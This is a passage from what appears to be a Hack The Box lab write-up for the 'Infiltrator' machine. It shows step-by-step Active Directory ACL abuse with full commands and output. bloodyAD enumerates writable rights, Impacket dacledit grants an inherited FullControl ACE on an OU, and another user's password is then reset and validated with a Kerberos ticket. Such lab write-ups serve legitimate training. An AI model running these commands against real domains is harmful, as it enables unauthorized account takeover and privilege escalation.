GenericAll

During domain enumeration with BloodHound, it was identified that the d.anderson user has the GenericAll privilege over the marketing digital OU

┌──(kali㉿kali)-[~/archive/htb/labs/infiltrator]
└─$ echo -e '[realms]\n\n\tINFILTRATOR.HTB = {\n\t\tkdc = dc01.infiltrator.htb\n\t}' | sudo tee /etc/krb5.conf
[realms]
 
	INFILTRATOR.HTB = {
		kdc = dc01.infiltrator.htb
	}

Setting up the /etc/krb5.conf file

┌──(kali㉿kali)-[~/archive/htb/labs/infiltrator]
└─$ KRB5CCNAME=d.anderson@dc01.infiltrator.htb.ccache bloodyAD -d INFILTRATOR.HTB -k --host dc01.infiltrator.htb get writable --detail  
 
[...REDACTED...]
 
distinguishedName: OU=Marketing Digital,DC=infiltrator,DC=htb
device: CREATE_CHILD
ipNetwork: CREATE_CHILD
organizationalUnit: CREATE_CHILD
intellimirrorGroup: CREATE_CHILD
msImaging-PSPs: CREATE_CHILD
msCOM-PartitionSet: CREATE_CHILD
remoteStorageServicePoint: CREATE_CHILD
nTFRSSettings: CREATE_CHILD
remoteMailRecipient: CREATE_CHILD
msTAPI-RtConference: CREATE_CHILD
inetOrgPerson: CREATE_CHILD
domainPolicy: CREATE_CHILD
msTAPI-RtPerson: CREATE_CHILD
msDS-App-Configuration: CREATE_CHILD
container: CREATE_CHILD
printQueue: CREATE_CHILD
indexServerCatalog: CREATE_CHILD
ipsecPolicy: CREATE_CHILD
volume: CREATE_CHILD
groupOfNames: CREATE_CHILD
msDS-ManagedServiceAccount: CREATE_CHILD
contact: CREATE_CHILD
msieee80211-Policy: CREATE_CHILD
document: CREATE_CHILD
person: CREATE_CHILD
mSMQMigratedUser: CREATE_CHILD
mS-SQL-OLAPServer: CREATE_CHILD
mS-SQL-SQLServer: CREATE_CHILD
organizationalPerson: CREATE_CHILD
msExchConfigurationContainer: CREATE_CHILD
msDS-GroupManagedServiceAccount: CREATE_CHILD
nisMap: CREATE_CHILD
nisObject: CREATE_CHILD
groupPolicyContainer: CREATE_CHILD
msDS-AzAdminManager: CREATE_CHILD
room: CREATE_CHILD
ipService: CREATE_CHILD
ipProtocol: CREATE_CHILD
msPKI-Key-Recovery-Agent: CREATE_CHILD
applicationVersion: CREATE_CHILD
residentialPerson: CREATE_CHILD
msMQ-Group: CREATE_CHILD
group: CREATE_CHILD
oncRpc: CREATE_CHILD
serviceConnectionPoint: CREATE_CHILD
msDS-AppData: CREATE_CHILD
rRASAdministrationConnectionPoint: CREATE_CHILD
locality: CREATE_CHILD
msDS-ShadowPrincipalContainer: CREATE_CHILD
classStore: CREATE_CHILD
account: CREATE_CHILD
user: CREATE_CHILD
msMQ-Custom-Recipient: CREATE_CHILD
rFC822LocalPart: CREATE_CHILD
groupOfUniqueNames: CREATE_CHILD
ipsecNegotiationPolicy: CREATE_CHILD
ipsecNFA: CREATE_CHILD
documentSeries: CREATE_CHILD
rpcContainer: CREATE_CHILD
serviceAdministrationPoint: CREATE_CHILD
intellimirrorSCP: CREATE_CHILD
organizationalRole: CREATE_CHILD
msCOM-Partition: CREATE_CHILD
ipsecFilter: CREATE_CHILD
physicalLocation: CREATE_CHILD
computer: CREATE_CHILD
nisNetgroup: CREATE_CHILD
applicationEntity: CREATE_CHILD
dSA: CREATE_CHILD
ipsecISAKMPPolicy: CREATE_CHILD
thumbnailLogo: WRITE
msDS-ObjectSoa: WRITE
msDS-SourceAnchor: WRITE
msDS-CloudAnchor: WRITE
msDS-LastKnownRDN: WRITE
isRecycled: WRITE
msDS-NcType: WRITE
msCOM-UserPartitionSetLink: WRITE
mS-DS-ConsistencyChildCount: WRITE
mS-DS-ConsistencyGuid: WRITE
otherWellKnownObjects: WRITE
dSCorePropagationData: WRITE
proxiedObjectName: WRITE
uSNSource: WRITE
gPOptions: WRITE
gPLink: WRITE
uPNSuffixes: WRITE
isCriticalSystemObject: WRITE
lastKnownParent: WRITE
url: WRITE
partialAttributeDeletionList: WRITE
managedBy: WRITE
partialAttributeSet: WRITE
wellKnownObjects: WRITE
defaultGroup: WRITE
systemFlags: WRITE
fSMORoleOwner: WRITE
desktopProfile: WRITE
wbemPath: WRITE
revision: WRITE
flags: WRITE
countryCode: WRITE
replUpToDateVector: WRITE
replPropertyMetaData: WRITE
objectGUID: WRITE
name: WRITE
USNIntersite: WRITE
wWWHomePage: WRITE
displayNamePrintable: WRITE
uSNDSALastObjRemoved: WRITE
extensionName: WRITE
adminDescription: WRITE
proxyAddresses: WRITE
adminDisplayName: WRITE
showInAdvancedViewOnly: WRITE
co: WRITE
uSNLastObjRem: WRITE
uSNChanged: WRITE
repsFrom: WRITE
repsTo: WRITE
objectVersion: WRITE
dSASignature: WRITE
isDeleted: WRITE
uSNCreated: WRITE
displayName: WRITE
subRefs: WRITE
whenChanged: WRITE
whenCreated: WRITE
dn: WRITE
userPassword: WRITE
seeAlso: WRITE
preferredDeliveryMethod: WRITE
destinationIndicator: WRITE
registeredAddress: WRITE
internationalISDNNumber: WRITE
x121Address: WRITE
facsimileTelephoneNumber: WRITE
teletexTerminalIdentifier: WRITE
telexNumber: WRITE
telephoneNumber: WRITE
physicalDeliveryOfficeName: WRITE
postOfficeBox: WRITE
postalCode: WRITE
postalAddress: WRITE
businessCategory: WRITE
searchGuide: WRITE
description: WRITE
street: WRITE
st: WRITE
l: WRITE
c: WRITE
cn: WRITE
objectCategory: WRITE
nTSecurityDescriptor: WRITE
instanceType: WRITE
ou: WRITE
objectClass: WRITE
OWNER: WRITE
DACL: WRITE

Confirming and reviewing details

Generic Descendent Object Takeover

The simplest and most straight forward way to abuse control of the OU is to apply a GenericAll ACE on the OU that will inherit down to all object types. This can be done using Impacket’s dacledit (cf. “grant rights” reference for the link).

┌──(kali㉿kali)-[~/archive/htb/labs/infiltrator]
└─$ python3 -m venv myVenv ; source ./myVenv/bin/activate ; cd myVenv
 
┌──(myVenv)─(kali㉿kali)-[~/…/htb/labs/infiltrator/myVenv]
└─$ git clone https://github.com/fortra/impacket ; cd impacket ; pip3 install -e .
 
┌──(myVenv)─(kali㉿kali)-[~/…/labs/infiltrator/myVenv/impacket]
└─$ KRB5CCNAME=../../d.anderson@dc01.infiltrator.htb.ccache dacledit.py INFILTRATOR.HTB/d.anderson@dc01.infiltrator.htb -k -no-pass -dc-ip $IP -action 'write' -rights 'FullControl' -inheritance -principal 'd.anderson' -target-dn 'OU=MARKETING DIGITAL,DC=INFILTRATOR,DC=HTB' -debug 
Impacket v0.12.0.dev1+20240830.154152.9aa0954b - Copyright 2023 Fortra
 
[+] Impacket Library Installation Path: /home/kali/archive/htb/labs/infiltrator/myVenv/impacket/impacket
[+] Using Kerberos Cache: ../../d.anderson@dc01.infiltrator.htb.ccache
[+] SPN LDAP/DC01@INFILTRATOR.HTB not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] Returning cached credential for KRBTGT/INFILTRATOR.HTB@INFILTRATOR.HTB
[+] Using TGT from cache
[+] Trying to connect to KDC at 10.10.11.31:88
[*] NB: objects with adminCount=1 will no inherit ACEs from their parent container/OU
[+] Initializing domainDumper()
[+] Target principal found in LDAP (OU=MARKETING DIGITAL,DC=INFILTRATOR,DC=HTB)
[+] Found principal SID: S-1-5-21-2606098828-3734741516-3625406802-1103
[+] Appending ACE (S-1-5-21-2606098828-3734741516-3625406802-1103 --(FullControl)--> None)
[+] ACE created.
[*] DACL backed up to dacledit-20240901-172635.bak
[+] Attempts to modify the Security Descriptor.
[*] DACL modified successfully!

Now, the d.anderson user will have full control of all descendent objects of each type, which includes the e.rodriguez user

Password Reset

┌──(kali㉿kali)-[~/archive/htb/labs/infiltrator]
└─$ KRB5CCNAME=d.anderson@dc01.infiltrator.htb.ccache bloodyAD -v DEBUG -d INFILTRATOR.HTB -k --host dc01.infiltrator.htb set password e.rodriguez 'Qwer1234'        
[+] Password changed successfully!

I can then reset the password of the descendent object, e.rodriguez

Validation

┌──(kali㉿kali)-[~/archive/htb/labs/infiltrator]
└─$ impacket-getTGT INFILTRATOR.HTB/e.rodriguez@dc01.infiltrator.htb -dc-ip $IP
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
 
Password: Qwer1234
[*] Saving ticket in e.rodriguez@dc01.infiltrator.htb.ccache

Successfully validated TGT generated for the e.rodriguez user

InfoSec LAB

Explorer

Infiltrator_GenericAll

GenericAll

Generic Descendent Object Takeover

Password Reset

Validation

Interactive Graph View

Table of Contents

Backlinks